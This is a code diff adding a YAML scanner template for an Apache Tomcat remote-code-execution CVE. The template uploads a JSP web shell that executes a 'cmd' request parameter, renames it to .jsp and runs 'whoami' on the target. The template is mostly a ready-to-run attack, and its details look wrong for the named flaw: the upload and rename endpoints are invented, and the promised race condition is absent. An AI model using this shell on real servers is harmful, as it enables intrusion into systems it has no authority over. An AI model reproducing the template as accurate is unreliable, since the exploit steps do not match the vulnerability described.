Merge 8001169 into 4f39b53

CVE-2024-50379.yaml

@@ -0,0 +1,74 @@
+id: CVE-2024-50379
+
+info:
+  name: Apache Tomcat TOCTOU RCE
+  author: s1d6p01nt7
+  severity: critical
+  description: |
+    Detects vulnerable versions of Apache Tomcat affected by CVE-2024-50379. If detected, it attempts exploitation by uploading a malicious file and verifying execution, including a simulated race condition during the file upload process.
+  tags: tomcat,rce,cve-2024-50379
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Apache-Coyote"
+      - type: regex
+        part: header
+        regex:
+          - "Apache Tomcat/(9\\.0\\.(5[0-9]|6[0-9]|7[0-7])|10\\.1\\.[0-7]|11\\.0\\.0-M[0-1])"
+
+  - raw:
+      - |
+        POST /uploads HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=boundary
+        Custom-Header: [email protected]
+
+        ------boundary
+        Content-Disposition: form-data; name="file"; filename="exploit.tmp"
+        Content-Type: text/plain
+
+        <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
+        ------boundary--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+  - raw:
+      - |
+        POST /uploads/rename HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Custom-Header: [email protected]
+
+        { "old_name": "exploit.tmp", "new_name": "exploit.jsp" }
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+  - raw:
+      - |
+        GET /uploads/exploit.jsp?cmd=whoami HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "tomcat"
+
+    stop-at-first-match: true